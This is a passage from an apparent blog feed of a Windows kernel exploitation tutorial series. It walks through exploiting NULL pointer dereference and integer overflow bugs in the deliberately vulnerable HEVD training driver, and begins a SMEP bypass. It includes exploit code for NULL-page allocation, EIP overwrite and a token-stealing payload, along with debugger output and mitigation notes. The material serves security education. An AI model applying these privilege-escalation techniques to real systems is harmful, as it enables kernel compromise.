class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] NullPointerDereference-&gt;Value: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">NullPointerDereference</span><span class="o">-&gt;</span><span class="n">Value</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] NullPointerDereference-&gt;Callback: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">NullPointerDereference</span><span class="o">-&gt;</span><span class="n">Callback</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Freeing NullPointerDereference Object</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Pool Tag: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">STRINGIFY</span><span class="p">(</span><span class="n">POOL_TAG</span><span class="p">));</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Pool Chunk: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">NullPointerDereference</span><span class="p">);</span> <span class="c1">// Free the allocated Pool chunk </span> <span class="n">ExFreePoolWithTag</span><span class="p">((</span><span class="n">PVOID</span><span class="p">)</span><span class="n">NullPointerDereference</span><span class="p">,</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">POOL_TAG</span><span class="p">);</span> <span class="c1">// Set to NULL to avoid dangling pointer </span> <span class="n">NullPointerDereference</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="p">}</span> <span class="cp">#ifdef SECURE </span> <span class="c1">// Secure Note: This is secure because the developer is checking if </span> <span class="c1">// 'NullPointerDereference' is not NULL before calling the callback function </span> <span class="k">if</span> <span class="p">(</span><span class="n">NullPointerDereference</span><span class="p">)</span> <span class="p">{</span> <span class="n">NullPointerDereference</span><span class="o">-&gt;</span><span class="n">Callback</span><span class="p">();</span> <span class="p">}</span> <span class="cp">#else </span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Triggering Null Pointer Dereference</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// Vulnerability Note: This is a vanilla Null Pointer Dereference vulnerability </span> <span class="c1">// because the developer is not validating if 'NullPointerDereference' is NULL </span> <span class="c1">// before calling the callback function </span> <span class="n">NullPointerDereference</span><span class="o">-&gt;</span><span class="n">Callback</span><span class="p">();</span> <span class="cp">#endif </span> <span class="p">}</span> <span class="kr">__except</span> <span class="p">(</span><span class="n">EXCEPTION_EXECUTE_HANDLER</span><span class="p">)</span> <span class="p">{</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">GetExceptionCode</span><span class="p">();</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[-] Exception Code: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Status</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="n">Status</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>Non-paged pool memory is allocated of size <code class="highlighter-rouge">NULL_POINTER_DEREFERENCE</code> with 4-bytes tag of value <code class="highlighter-rouge">kcaH</code>. <code class="highlighter-rouge">NULL_POINTER_DEREFERENCE</code>struct contains two fields:</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">typedef</span> <span class="k">struct</span> <span class="n">_NULL_POINTER_DEREFERENCE</span> <span class="p">{</span> <span class="n">ULONG</span> <span class="n">Value</span><span class="p">;</span> <span class="n">FunctionPointer</span> <span class="n">Callback</span><span class="p">;</span> <span class="p">}</span> <span class="n">NULL_POINTER_DEREFERENCE</span><span class="p">,</span> <span class="o">*</span><span class="n">PNULL_POINTER_DEREFERENCE</span><span class="p">;</span> </code></pre></div></div> <p>The size of this struct is 8 bytes on x86 and contains a function pointer. If the user-supplied buffer contains <code class="highlighter-rouge">MagicValue</code>, the function pointer <code class="highlighter-rouge">NullPointerDereference-&gt;Callback</code> will point to <code class="highlighter-rouge">NullPointerDereferenceObjectCallback</code>. But what happens if we don’t submit that value?</p> <p>In that case, the pool memory gets freed and <code class="highlighter-rouge">NullPointerDereference</code> is set to NULL to avoid a dangling pointer. But this is only as good as validation goes, so everytime you use that pointer you need to check if it’s NULL, just setting it to NULL and not performing proper validation could be disastrous, like in this example. In our case, the <code class="highlighter-rouge">Callback</code> is called without validating if this inside a valid struct, and it ends up reading from the NULL page (first 64K bytes) which resides in usermode.</p> <p>In this case, <code class="highlighter-rouge">NullPointerDereference</code> is just a struct at <code class="highlighter-rouge">0x00000000</code> and <code class="highlighter-rouge">NullPointerDereference-&gt;Callback()</code> calls whatever is at address <code class="highlighter-rouge">0x00000004</code>. How are we going to exploit this?</p> <p>The exploit will do the following:</p> <ol> <li>Allocate the NULL page.</li> <li>Put the address of the payload at <code class="highlighter-rouge">0x4</code>.</li> <li>Trigger the NULL page dereferencing through the driver IOCTL.</li> </ol> <hr /> <h3 id="brief-history-on-mitigation-effort-for-null-page-dereference-vulnerabilities">Brief history on mitigation effort for NULL page dereference vulnerabilities</h3> <p>Before we continue, let’s discuss the efforts done in Windows to prevent attacks on NULL pointer dereference vulnerabilities.</p> <ul> <li> <p>EMET (Enhanced Mitigation Experience Toolkit), a security tool packed with exploit mitigations offered protection against NULL page dereference attacks by simply allocating the NULL page and marking it as “NOACCESS”. EMET is now deprecated and some parts of it are integrated into Windows 10, called Exploit Protection.</p> </li> <li> <p>Starting Windows 8, allocating the first 64K bytes is prohibited. The only exception is by enabling NTVDM but this has been disabled by default.</p> </li> </ul> <p>Bottom line: vulnerability is not exploitable on our Windows 10 VM. If you really want to exploit it, enable NTVDM, then you’ll have to bypass SMEP (part 4 discussed this).</p> <p>Recommended reads:</p> <ul> <li><a href="https://media.blackhat.com/bh-us-12/Briefings/M_Miller/BH_US_12_Miller_Exploit_Mitigation_Slides.pdf">Exploit Mitigation Improvements in Windows 8</a></li> <li><a href="https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf">Windows 10 Mitigation Improvements</a></li> </ul> <hr /> <h3 id="2-allocating-the-null-page">2. Allocating the NULL page</h3> <p>Before we talk with the driver, we need to allocate our NULL page and put the address of the payload at <code class="highlighter-rouge">0x4</code>. Allocating the NULL page through <code class="highlighter-rouge">VirtualAllocEx</code> is not possible, instead, we can resolve the address of <code class="highlighter-rouge">NtAllocateVirtualMemory</code> in <code class="highlighter-rouge">ntdll.dll</code> and pass a small non-zero base address which gets rounded down to NULL.</p> <p>To resolve the address of the function, we’ll use <code class="highlighter-rouge">GetModuleHandle</code> to get the address of <code class="highlighter-rouge">ntdll.dll</code> then <code class="highlighter-rouge">GetProcAddress</code> to get the process address.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="n">NTSTATUS</span><span class="p">(</span><span class="n">WINAPI</span> <span class="o">*</span><span class="n">ptrNtAllocateVirtualMemory</span><span class="p">)(</span> <span class="n">HANDLE</span> <span class="n">ProcessHandle</span><span class="p">,</span> <span class="n">PVOID</span> <span class="o">*</span><span class="n">BaseAddress</span><span class="p">,</span> <span class="n">ULONG</span> <span class="n">ZeroBits</span><span class="p">,</span> <span class="n">PULONG</span> <span class="n">AllocationSize</span><span class="p">,</span> <span class="n">ULONG</span> <span class="n">AllocationType</span><span class="p">,</span> <span class="n">ULONG</span> <span class="n">Protect</span> <span class="p">);</span> <span class="n">ptrNtAllocateVirtualMemory</span> <span class="n">NtAllocateVirtualMemory</span> <span class="o">=</span> <span class="p">(</span><span class="n">ptrNtAllocateVirtualMemory</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">GetModuleHandle</span><span class="p">(</span><span class="s">"ntdll.dll"</span><span class="p">),</span> <span class="s">"NtAllocateVirtualMemory"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">NtAllocateVirtualMemory</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[-] Failed to export NtAllocateVirtualMemory."</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>Next we need to allocate the NULL page:</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c1">// Copied and modified from http://www.rohitab.com/discuss/topic/34884-c-small-hax-to-avoid-crashing-ur-prog/ </span><span class="n">LPVOID</span> <span class="n">baseAddress</span> <span class="o">=</span> <span class="p">(</span><span class="n">LPVOID</span><span class="p">)</span><span class="mh">0x1</span><span class="p">;</span> <span class="n">ULONG</span> <span class="n">allocSize</span> <span class="o">=</span> <span class="mh">0x1000</span><span class="p">;</span> <span class="kt">char</span><span class="o">*</span> <span class="n">uBuffer</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">NtAllocateVirtualMemory</span><span class="p">(</span> <span class="n">GetCurrentProcess</span><span class="p">(),</span> <span class="o">&amp;</span><span class="n">baseAddress</span><span class="p">,</span> <span class="c1">// Putting a small non-zero value gets rounded down to page granularity, pointing to the NULL page </span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">allocSize</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span> </code></pre></div></div> <p>To verify if that’s working, put a <code class="highlighter-rouge">DebugBreak</code> and check the memory content after writing some dummy value.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">DebugBreak</span><span class="p">();</span> <span class="o">*</span><span class="p">(</span><span class="n">INT_PTR</span><span class="o">*</span><span class="p">)</span><span class="n">uBuffer</span> <span class="o">=</span> <span class="mh">0xaabbccdd</span><span class="p">;</span> </code></pre></div></div> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; t KERNELBASE!DebugBreak+0x3: 001b:7531492f ret kd&gt; ? @esi Evaluate expression: 0 = 00000000 kd&gt; t HEVD!main+0x1a4: 001b:002e11e4 mov dword ptr [esi],0AABBCCDDh kd&gt; t HEVD!main+0x1aa: 001b:002e11ea movsx ecx,byte ptr [esi] kd&gt; dd 0 00000000 aabbccdd 00000000 00000000 00000000 00000010 00000000 00000000 00000000 00000000 00000020 00000000 00000000 00000000 00000000 00000030 00000000 00000000 00000000 00000000 00000040 00000000 00000000 00000000 00000000 00000050 00000000 00000000 00000000 00000000 00000060 00000000 00000000 00000000 00000000 00000070 00000000 00000000 00000000 00000000 </code></pre></div></div> <p>A nice way to verify the NULL page is allocated, is by calling <code class="highlighter-rouge">VirtualProtect</code> which queries/sets the protection flags on memory segments. <code class="highlighter-rouge">VirtualProtect</code> returning false means the NULL page was not allocated.</p> <hr /> <h3 id="3-controlling-execution-flow">3. Controlling execution flow</h3> <p>Now we want to put our payload address at <code class="highlighter-rouge">0x00000004</code>:</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">*</span><span class="p">(</span><span class="n">INT_PTR</span><span class="o">*</span><span class="p">)(</span><span class="n">uBuffer</span> <span class="o">+</span> <span class="mi">4</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="n">INT_PTR</span><span class="p">)</span><span class="o">&amp;</span><span class="n">StealToken</span><span class="p">;</span> </code></pre></div></div> <p>Now create a dummy buffer to send to the driver and put a breakpoint at <code class="highlighter-rouge">HEVD!TriggerNullPointerDereference + 0x114</code>.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; dd 0 00000000 00000000 0107129c 00000000 00000000 00000010 00000000 00000000 00000000 00000000 00000020 00000000 00000000 00000000 00000000 00000030 00000000 00000000 00000000 00000000 00000040 00000000 00000000 00000000 00000000 00000050 00000000 00000000 00000000 00000000 00000060 00000000 00000000 00000000 00000000 00000070 00000000 00000000 00000000 00000000 </code></pre></div></div> <p>Finally, after executing the token stealing payload, a <code class="highlighter-rouge">ret</code> with no stack adjusting will do.</p> <p><img src="http://abatchy17.github.io/images/kernel7.png" alt="Exploit_screenshot" /></p> <h3 id="4-porting-to-windows-7-x64">4. Porting to Windows 7 x64</h3> <p>To port the exploit, you only need to adjust the offset at which you write the payload address as the struct size becomes 16 bytes. Also don’t forget to swap out the payload.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">*</span><span class="p">(</span><span class="n">INT_PTR</span><span class="o">*</span><span class="p">)(</span><span class="n">uBuffer</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="n">INT_PTR</span><span class="p">)</span><span class="o">&amp;</span><span class="n">StealToken</span><span class="p">;</span> </code></pre></div></div> <hr /> <p>- Abatchy</p> Wed, 17 Jan 2018 00:00:00 +0000 http://abatchy17.github.io/2018/01/kernel-exploitation-6 http://abatchy17.github.io/2018/01/kernel-exploitation-6 [Kernel Exploitation] 5: Integer Overflow <p><em>This part shows how to exploit a vanilla integer overflow vulnerability. Post builds up on lots of contents from part 3 &amp; 4 so this is a pretty short one.</em></p> <p><em>Exploit code can be found <a href="https://github.com/abatchy17/HEVD-Exploits/tree/master/IntegerOverflow">here</a>.</em></p> <hr /> <h3 id="1-the-vulnerability">1. The vulnerability</h3> <p>Link to code <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/106e3dd5d9c49326d55ce17c919bffa68ead1467/Driver/IntegerOverflow.c#L65">here</a>.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">NTSTATUS</span> <span class="nf">TriggerIntegerOverflow</span><span class="p">(</span><span class="n">IN</span> <span class="n">PVOID</span> <span class="n">UserBuffer</span><span class="p">,</span> <span class="n">IN</span> <span class="n">SIZE_T</span> <span class="n">Size</span><span class="p">)</span> <span class="p">{</span> <span class="n">ULONG</span> <span class="n">Count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">NTSTATUS</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">STATUS_SUCCESS</span><span class="p">;</span> <span class="n">ULONG</span> <span class="n">BufferTerminator</span> <span class="o">=</span> <span class="mh">0xBAD0B0B0</span><span class="p">;</span> <span class="n">ULONG</span> <span class="n">KernelBuffer</span><span class="p">[</span><span class="n">BUFFER_SIZE</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">SIZE_T</span> <span class="n">TerminatorSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">BufferTerminator</span><span class="p">);</span> <span class="n">PAGED_CODE</span><span class="p">();</span> <span class="kr">__try</span> <span class="p">{</span> <span class="c1">// Verify if the buffer resides in user mode </span> <span class="n">ProbeForRead</span><span class="p">(</span><span class="n">UserBuffer</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">KernelBuffer</span><span class="p">),</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">__alignof</span><span class="p">(</span><span class="n">KernelBuffer</span><span class="p">));</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] UserBuffer: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">UserBuffer</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] UserBuffer Size: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Size</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] KernelBuffer: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">KernelBuffer</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] KernelBuffer Size: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">KernelBuffer</span><span class="p">));</span> <span class="cp">#ifdef SECURE </span> <span class="c1">// Secure Note: This is secure because the developer is not doing any arithmetic </span> <span class="c1">// on the user supplied value. Instead, the developer is subtracting the size of </span> <span class="c1">// ULONG i.e. 4 on x86 from the size of KernelBuffer. Hence, integer overflow will </span> <span class="c1">// not occur and this check will not fail </span> <span class="k">if</span> <span class="p">(</span><span class="n">Size</span> <span class="o">&gt;</span> <span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="n">KernelBuffer</span><span class="p">)</span> <span class="o">-</span> <span class="n">TerminatorSize</span><span class="p">))</span> <span class="p">{</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[-] Invalid UserBuffer Size: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Size</span><span class="p">);</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">STATUS_INVALID_BUFFER_SIZE</span><span class="p">;</span> <span class="k">return</span> <span class="n">Status</span><span class="p">;</span> <span class="p">}</span> <span class="cp">#else </span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Triggering Integer Overflow</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// Vulnerability Note: This is a vanilla Integer Overflow vulnerability because if </span> <span class="c1">// 'Size' is 0xFFFFFFFF and we do an addition with size of ULONG i.e. 4 on x86, the </span> <span class="c1">// integer will wrap down and will finally cause this check to fail </span> <span class="k">if</span> <span class="p">((</span><span class="n">Size</span> <span class="o">+</span> <span class="n">TerminatorSize</span><span class="p">)</span> <span class="o">&gt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">KernelBuffer</span><span class="p">))</span> <span class="p">{</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[-] Invalid UserBuffer Size: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Size</span><span class="p">);</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">STATUS_INVALID_BUFFER_SIZE</span><span class="p">;</span> <span class="k">return</span> <span class="n">Status</span><span class="p">;</span> <span class="p">}</span> <span class="cp">#endif </span> <span class="c1">// Perform the copy operation </span> <span class="k">while</span> <span class="p">(</span><span class="n">Count</span> <span class="o">&lt;</span> <span class="p">(</span><span class="n">Size</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">ULONG</span><span class="p">)))</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">PULONG</span><span class="p">)</span><span class="n">UserBuffer</span> <span class="o">!=</span> <span class="n">BufferTerminator</span><span class="p">)</span> <span class="p">{</span> <span class="n">KernelBuffer</span><span class="p">[</span><span class="n">Count</span><span class="p">]</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">PULONG</span><span class="p">)</span><span class="n">UserBuffer</span><span class="p">;</span> <span class="n">UserBuffer</span> <span class="o">=</span> <span class="p">(</span><span class="n">PULONG</span><span class="p">)</span><span class="n">UserBuffer</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="n">Count</span><span class="o">++</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="kr">__except</span> <span class="p">(</span><span class="n">EXCEPTION_EXECUTE_HANDLER</span><span class="p">)</span> <span class="p">{</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">GetExceptionCode</span><span class="p">();</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[-] Exception Code: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Status</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="n">Status</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>Like the comment says, this is a vanilla integer overflow vuln caused by the programmer not considering a very large buffer size being passed to the driver. Any size from <code class="highlighter-rouge">0xfffffffc</code> to ``0xffffffff` will cause this check to be bypassed. Notice that the copy operation terminates if the terminator value is encountered (has to be 4-bytes aligned though), so we don’t need to submit a buffer length of size equal to the one we pass.</p> <h4 id="exploitability-on-64-bit">Exploitability on 64-bit</h4> <p>The <code class="highlighter-rouge">InBufferSize</code> parameter passed to <code class="highlighter-rouge">DeviceIoControl</code> is a DWORD, meaning it’s always of size 4 bytes. In the 64-bit driver, the following code does the comparison:</p> <p>At <code class="highlighter-rouge">HEVD!TriggerIntegerOverflow+97</code>:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fffff800`bb1c5ac7 lea r11,[r12+4] fffff800`bb1c5acc cmp r11,r13 </code></pre></div></div> <p>Comparison is done with 64-bit registers (no prefix/suffix was used to cast them to their 32-bit representation). This way, <code class="highlighter-rouge">r11</code> will never overflow as it’ll be just set to <code class="highlighter-rouge">0x100000003</code>, meaning that this vulnerability is <strong>not exploitable</strong> on 64-bit machines.</p> <p>Update: I didn’t realize it at first, but the reason those values are treated fine in x64 arch is that all of them are of <code class="highlighter-rouge">size_t</code>.</p> <hr /> <h3 id="2-controlling-execution-flow">2. Controlling execution flow</h3> <p>First, we need to figure out the offset for EIP. Sending a small buffer and calculating the offset between the kernel buffer address and the return address will do:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; g [+] UserBuffer: 0x00060000 [+] UserBuffer Size: 0xFFFFFFFF [+] KernelBuffer: 0x8ACF8274 [+] KernelBuffer Size: 0x800 [+] Triggering Integer Overflow Breakpoint 3 hit HEVD!TriggerIntegerOverflow+0x84: 93f8ca58 add esp,24h kd&gt; ? 0x8ACF8274 - @esp Evaluate expression: 16 = 00000010 kd&gt; ? (@ebp + 4) - 0x8ACF8274 Evaluate expression: 2088 = 828 </code></pre></div></div> <p>Notice that you need to have the terminator value 4-bytes aligned as otherwise it will use the submitted <code class="highlighter-rouge">Size</code> parameter which will ultimately result in reading beyond the buffer and possibly causing an access violation.</p> <p>Now we know that RET is at offset <strong>2088</strong>. The terminator value should be at <code class="highlighter-rouge">2088 + 4</code>.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">char</span><span class="o">*</span> <span class="n">uBuffer</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">VirtualAlloc</span><span class="p">(</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">2088</span> <span class="o">+</span> <span class="mi">4</span> <span class="o">+</span> <span class="mi">4</span><span class="p">,</span> <span class="c1">// EIP offset + 4 bytes for EIP + 4 bytes for terminator </span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span> <span class="c1">// Constructing buffer </span><span class="n">RtlFillMemory</span><span class="p">(</span><span class="n">uBuffer</span><span class="p">,</span> <span class="n">SIZE</span><span class="p">,</span> <span class="sc">'A'</span><span class="p">);</span> <span class="c1">// Overwriting EIP </span><span class="n">DWORD</span><span class="o">*</span> <span class="n">payload_address</span> <span class="o">=</span> <span class="p">(</span><span class="n">DWORD</span><span class="o">*</span><span class="p">)(</span><span class="n">uBuffer</span> <span class="o">+</span> <span class="n">SIZE</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="o">*</span><span class="n">payload_address</span> <span class="o">=</span> <span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="o">&amp;</span><span class="n">StealToken</span><span class="p">;</span> <span class="c1">// Copying terminator value </span><span class="n">RtlCopyMemory</span><span class="p">(</span><span class="n">uBuffer</span> <span class="o">+</span> <span class="n">SIZE</span> <span class="o">-</span> <span class="mi">4</span><span class="p">,</span> <span class="n">terminator</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span> </code></pre></div></div> <p>That’s pretty much it! At the end of the payload (<code class="highlighter-rouge">StealToken</code>) you need to make up for the missing stack frame by calling the remaining instructions (explained in detail in part 3).</p> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pop</span> <span class="n">ebp</span> <span class="c">; Restore saved EBP</span> <span class="k">ret</span> <span class="mi">8</span> <span class="c">; Return cleanly</span> </code></pre></div></div> <p><img src="http://abatchy17.github.io/images/kernel6.png" alt="shell" /></p> <p>Full exploit can be found <a href="https://github.com/abatchy17/HEVD-Exploits/tree/master/IntegerOverflow/Win7_x86_SP1">here</a>.</p> <h3 id="3-mitigating-the-vulnerability">3. Mitigating the vulnerability</h3> <ol> <li> <p>Handle all code paths that deal with arithmetics with extreme care (especially when they’re user-supplied). Check operants/result for overflow/underflow condition.</p> </li> <li> <p>Use an integer type that will be able to hold all possible outputs of the addition, although this might not be always possible.</p> </li> </ol> <p><a href="http://safeint.codeplex.com/">SafeInt</a> is worth checking out too.</p> <h3 id="4-recap">4. Recap</h3> <ol> <li> <p>Vulnerability was not exploitable on 64-bit systems due to the way the comparison takes place between two 64-bit registers and the maximum value passed to <code class="highlighter-rouge">DeviceIoControl</code> will never overflow.</p> </li> <li> <p>Submitted buffer had to contain a 4-byte terminator value. This is the simplest form of crafting a payload that needs to meet certain criteria.</p> </li> <li> <p>Although our buffer wasn’t of extreme size, “lying” about its length to the driver was possible.</p> </li> </ol> <hr /> <p>- Abatchy</p> Sat, 13 Jan 2018 00:00:00 +0000 http://abatchy17.github.io/2018/01/kernel-exploitation-5 http://abatchy17.github.io/2018/01/kernel-exploitation-5 [Kernel Exploitation] 4: Stack Buffer Overflow (SMEP Bypass) <p><em>Part 3 showed how exploitation is done for the stack buffer overflow vulnerability on a Windows 7 x86/x64 machine. This part will target Windows 10 x64, which has SMEP enabled by default on it.</em></p> <p><em>Exploit code can be found <a href="https://github.com/abatchy17/HEVD-Exploits/tree/master/StackOverflow">here</a>.</em></p> <p><em>Windows build: 16299.15.amd64fre.rs3_release.170928-1534</em></p> <p><em>ntoskrnl’s version: 10.0.16288.192</em></p> <hr /> <p>Instead of mouthfeeding you the problem, let’s run the <a href="https://github.com/abatchy17/HEVD-Exploits/blob/master/StackOverflow/Win7_x64_SP1/StackOverflow.exe">x64 exploit</a> on the Windows 10 machine and see what happens.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; bu HEVD!TriggerStackOverflow + 0xc8 kd&gt; g Breakpoint 1 hit HEVD!TriggerStackOverflow+0xc8: fffff801`7c4d5708 ret kd&gt; k # Child-SP RetAddr Call Site 00 ffffa308`83dfe798 00007ff6`8eff11d0 HEVD!TriggerStackOverflow+0xc8 [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 101] 01 ffffa308`83dfe7a0 ffffd50f`91a47110 0x00007ff6`8eff11d0 02 ffffa308`83dfe7a8 00000000`00000000 0xffffd50f`91a47110 </code></pre></div></div> <p>Examining the instructions at <code class="highlighter-rouge">00007ff68eff11d0</code> verifies that it’s our payload. What would go wrong?</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; t 00007ff6`8eff11d0 xor rax,rax kd&gt; t KDTARGET: Refreshing KD connection *** Fatal System Error: 0x000000fc (0x00007FF68EFF11D0,0x0000000037ADB025,0xFFFFA30883DFE610,0x0000000080000005) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. </code></pre></div></div> <p>Stop error <code class="highlighter-rouge">0x000000fc</code> indicates a <code class="highlighter-rouge">ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY</code> issue which is caused by a hardware mitigation called SMEP (Supervisor Mode Execution Prevention).</p> <p>Continueing execution results in this lovely screen…</p> <p><img src="http://abatchy17.github.io/images/kernel5.png" alt="smep_1" /></p> <h3 id="1-so-whats-smep">1. So what’s SMEP?</h3> <p>SMEP (Supervisor Mode Execution Prevention) is a hardware mitigation introducted by Intel (branded as <a href="https://software.intel.com/sites/default/files/article/475900/intel-xeon-processor-e5-2600-v2-product-family-technical-overview.pdf#%5B%7B%22num%22%3A24%2C%22gen%22%3A0%7D%2C%7B%22name%22%3A%22XYZ%22%7D%2C87%2C295%2C0%5D">“OS Guard”</a>) that restricts executing code that lies in usermode to be executed with Ring-0 privileges, attempts result in a crash. This basically prevents EoP exploits that rely on executing a usermode payload from ever executing it.</p> <p>The SMEP bit is bit 20 of the CR4 register, which Intel defines as:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CR4 — Contains a group of flags that enable several architectural extensions, and indicate operating system or executive support for specific processor capabilities. </code></pre></div></div> <p>Setting this bit to 1 enables SMEP, while setting it to 0 disables it (duh).</p> <p>You can read more about this in the <a href="https://software.intel.com/sites/default/files/managed/39/c5/325462-sdm-vol-1-2abcd-3abcd.pdf">Intel Developer’s Manual</a>.</p> <h3 id="2-bypassing-smep">2. Bypassing SMEP</h3> <p>There are a few ways described in the reading material that allow you to bypass SMEP, I recommend reading them for better understanding. For this exploit we’ll use the first method described in <a href="http://j00ru.vexillium.org/?p=783">j00ru’s blog</a>:</p> <ul> <li> <p>Construct a ROP chain that reads the content of CR4, flips the 20th bit and writes the new value to CR4. With SMEP disabled, we can “safely” jump to our user-mode payload.</p> </li> <li> <p>If reading and/or modifying the content is not possible, just popping a “working” value to CR4 register will work. While this is not exactly elegant or clean, it does the job.</p> </li> </ul> <p>Worth noting is that <a href="https://blogs.technet.microsoft.com/mmpc/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/">Hyperguard won’t allow modifying 